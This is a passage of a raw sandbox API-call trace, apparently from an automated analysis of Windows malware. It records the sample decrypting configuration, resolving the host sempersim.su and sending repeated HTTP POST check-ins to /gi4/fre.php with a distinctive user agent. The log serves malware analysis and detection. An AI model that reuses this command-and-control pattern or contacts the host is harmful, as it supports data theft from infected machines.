RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8560 [0232.406] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0232.406] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c8560, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0232.409] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0232.409] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0232.409] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0232.410] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0232.410] GetProcessHeap () returned 0x5b0000 [0232.410] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8560 | out: hHeap=0x5b0000) returned 1 [0232.411] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0232.411] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d31e8, pdwDataLen=0xdfcfc | out: pbData=0x5d31e8, pdwDataLen=0xdfcfc) returned 1 [0232.411] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0232.412] CryptDestroyKey (hKey=0x5bde08) returned 1 [0232.412] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0232.413] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0232.413] GetProcessHeap () returned 0x5b0000 [0232.413] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0232.413] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0232.413] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0232.414] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0232.414] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0232.415] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0232.415] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0232.416] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0232.416] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0232.416] GetProcessHeap () returned 0x5b0000 [0232.416] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0232.416] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0232.416] GetProcessHeap () returned 0x5b0000 [0232.417] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0232.417] GetProcessHeap () returned 0x5b0000 [0232.417] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0232.417] GetProcessHeap () returned 0x5b0000 [0232.417] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d31e8 | out: hHeap=0x5b0000) returned 1 [0232.417] GetProcessHeap () returned 0x5b0000 [0232.417] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3110 [0232.418] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0232.418] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0232.427] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0232.427] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0232.433] GetProcessHeap () returned 0x5b0000 [0232.433] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0232.434] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0232.434] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0232.435] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0232.435] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0232.436] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0232.436] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0232.436] GetProcessHeap () returned 0x5b0000 [0232.437] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0232.437] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0232.438] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3110, pdwDataLen=0xdfcfc | out: pbData=0x5d3110, pdwDataLen=0xdfcfc) returned 1 [0232.440] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0232.440] CryptDestroyKey (hKey=0x5bde08) returned 1 [0232.441] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0232.441] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0232.441] GetProcessHeap () returned 0x5b0000 [0232.441] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5070 [0232.442] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0232.442] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0232.443] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0232.443] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0232.443] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0232.444] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0232.444] GetProcessHeap () returned 0x5b0000 [0232.444] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0232.444] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cde80*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2d8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0232.445] GetProcessHeap () returned 0x5b0000 [0232.445] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca910 [0232.445] socket (af=2, type=1, protocol=6) returned 0x358 [0232.445] connect (s=0x358, name=0x5cf2d8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0232.517] FreeAddrInfoW (pAddrInfo=0x5cde80*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2d8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0232.517] GetProcessHeap () returned 0x5b0000 [0232.517] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5cc8 [0232.517] GetProcessHeap () returned 0x5b0000 [0232.517] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0232.517] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0232.518] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0232.518] GetProcessHeap () returned 0x5b0000 [0232.518] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0232.518] GetProcessHeap () returned 0x5b0000 [0232.519] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0232.519] GetProcessHeap () returned 0x5b0000 [0232.519] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3428 [0232.519] GetProcessHeap () returned 0x5b0000 [0232.519] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0232.520] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0232.521] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0232.521] GetProcessHeap () returned 0x5b0000 [0232.521] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0232.521] GetProcessHeap () returned 0x5b0000 [0232.521] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0232.521] send (s=0x358, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0232.522] send (s=0x358, buf=0x5d1e18*, len=159, flags=0) returned 159 [0232.522] GetProcessHeap () returned 0x5b0000 [0232.522] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0232.522] recv (in: s=0x358, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0234.013] GetProcessHeap () returned 0x5b0000 [0234.013] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0234.013] GetProcessHeap () returned 0x5b0000 [0234.014] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3428 | out: hHeap=0x5b0000) returned 1 [0234.014] GetProcessHeap () returned 0x5b0000 [0234.014] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0234.014] GetProcessHeap () returned 0x5b0000 [0234.014] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5cc8 | out: hHeap=0x5b0000) returned 1 [0234.014] closesocket (s=0x358) returned 0 [0234.015] GetProcessHeap () returned 0x5b0000 [0234.016] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca910 | out: hHeap=0x5b0000) returned 1 [0234.016] GetProcessHeap () returned 0x5b0000 [0234.016] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5070 | out: hHeap=0x5b0000) returned 1 [0234.016] GetProcessHeap () returned 0x5b0000 [0234.016] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3110 | out: hHeap=0x5b0000) returned 1 [0234.016] GetProcessHeap () returned 0x5b0000 [0234.017] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0234.023] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xdac) returned 0x358 [0234.025] Sleep (dwMilliseconds=0xea60) [0234.036] GetProcessHeap () returned 0x5b0000 [0234.036] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d32c0 [0234.037] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0234.037] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0234.065] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0234.065] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0234.075] GetProcessHeap () returned 0x5b0000 [0234.075] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8800 [0234.076] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0234.077] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c8800, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0234.081] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0234.081] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0234.082] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0234.082] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0234.082] GetProcessHeap () returned 0x5b0000 [0234.083] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8800 | out: hHeap=0x5b0000) returned 1 [0234.083] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0234.084] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d32c0, pdwDataLen=0xdfcfc | out: pbData=0x5d32c0, pdwDataLen=0xdfcfc) returned 1 [0234.085] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0234.085] CryptDestroyKey (hKey=0x5bde08) returned 1 [0234.086] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0234.086] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0234.086] GetProcessHeap () returned 0x5b0000 [0234.086] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5b38 [0234.087] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0234.087] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0234.088] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0234.088] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0234.089] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0234.089] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0234.090] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0234.090] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0234.090] GetProcessHeap () returned 0x5b0000 [0234.090] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb100 [0234.091] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0234.091] GetProcessHeap () returned 0x5b0000 [0234.092] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb100 | out: hHeap=0x5b0000) returned 1 [0234.092] GetProcessHeap () returned 0x5b0000 [0234.092] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5b38 | out: hHeap=0x5b0000) returned 1 [0234.092] GetProcessHeap () returned 0x5b0000 [0234.093] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d32c0 | out: hHeap=0x5b0000) returned 1 [0234.093] GetProcessHeap () returned 0x5b0000 [0234.093] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3500 [0234.094] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0234.097] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0234.102] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0234.102] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0234.108] GetProcessHeap () returned 0x5b0000 [0234.108] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8800 [0234.111] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0234.111] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c8800, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0234.112] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0234.112] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0234.113] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0234.113] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0234.113] GetProcessHeap () returned 0x5b0000 [0234.113] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8800 | out: hHeap=0x5b0000) returned 1 [0234.114] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0234.114] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3500, pdwDataLen=0xdfcfc | out: pbData=0x5d3500, pdwDataLen=0xdfcfc) returned 1 [0234.115] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0234.115] CryptDestroyKey (hKey=0x5bde08) returned 1 [0234.116] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0234.116] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0234.116] GetProcessHeap () returned 0x5b0000 [0234.116] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5d60 [0234.117] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0234.117] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0234.118] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0234.118] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0234.119] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0234.119] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0234.119] GetProcessHeap () returned 0x5b0000 [0234.119] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb100 [0234.119] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdcc8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf308*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0234.122] GetProcessHeap () returned 0x5b0000 [0234.122] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa30 [0234.122] socket (af=2, type=1, protocol=6) returned 0x35c [0234.122] connect (s=0x35c, name=0x5cf308*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0234.251] FreeAddrInfoW (pAddrInfo=0x5cdcc8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf308*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0234.251] GetProcessHeap () returned 0x5b0000 [0234.251] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5998 [0234.251] GetProcessHeap () returned 0x5b0000 [0234.251] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0234.252] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0234.253] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0234.253] GetProcessHeap () returned 0x5b0000 [0234.253] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0234.253] GetProcessHeap () returned 0x5b0000 [0234.253] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0234.254] GetProcessHeap () returned 0x5b0000 [0234.254] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3620 [0234.254] GetProcessHeap () returned 0x5b0000 [0234.254] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0234.254] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0234.255] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0234.255] GetProcessHeap () returned 0x5b0000 [0234.255] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0234.255] GetProcessHeap () returned 0x5b0000 [0234.256] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0234.256] send (s=0x35c, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0234.256] send (s=0x35c, buf=0x5d1e18*, len=159, flags=0) returned 159 [0234.256] GetProcessHeap () returned 0x5b0000 [0234.257] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0234.257] recv (in: s=0x35c, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0235.297] GetProcessHeap () returned 0x5b0000 [0235.298] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0235.298] GetProcessHeap () returned 0x5b0000 [0235.298] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3620 | out: hHeap=0x5b0000) returned 1 [0235.298] GetProcessHeap () returned 0x5b0000 [0235.298] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0235.298] GetProcessHeap () returned 0x5b0000 [0235.298] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5998 | out: hHeap=0x5b0000) returned 1 [0235.298] closesocket (s=0x35c) returned 0 [0235.299] GetProcessHeap () returned 0x5b0000 [0235.299] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa30 | out: hHeap=0x5b0000) returned 1 [0235.299] GetProcessHeap () returned 0x5b0000 [0235.300] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5d60 | out: hHeap=0x5b0000) returned 1 [0235.300] GetProcessHeap () returned 0x5b0000 [0235.300] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3500 | out: hHeap=0x5b0000) returned 1 [0235.300] GetProcessHeap () returned 0x5b0000 [0235.300] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb100 | out: hHeap=0x5b0000) returned 1 [0235.300] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x4c4) returned 0x35c [0235.302] Sleep (dwMilliseconds=0xea60) [0235.312] GetProcessHeap () returned 0x5b0000 [0235.312] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2f60 [0235.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0235.314] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0235.324] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0235.325] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0235.334] GetProcessHeap () returned 0x5b0000 [0235.334] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8680 [0235.335] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0235.335] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c8680, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0235.336] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0235.336] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0235.337] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0235.337] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0235.337] GetProcessHeap () returned 0x5b0000 [0235.337] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8680 | out: hHeap=0x5b0000) returned 1 [0235.338] 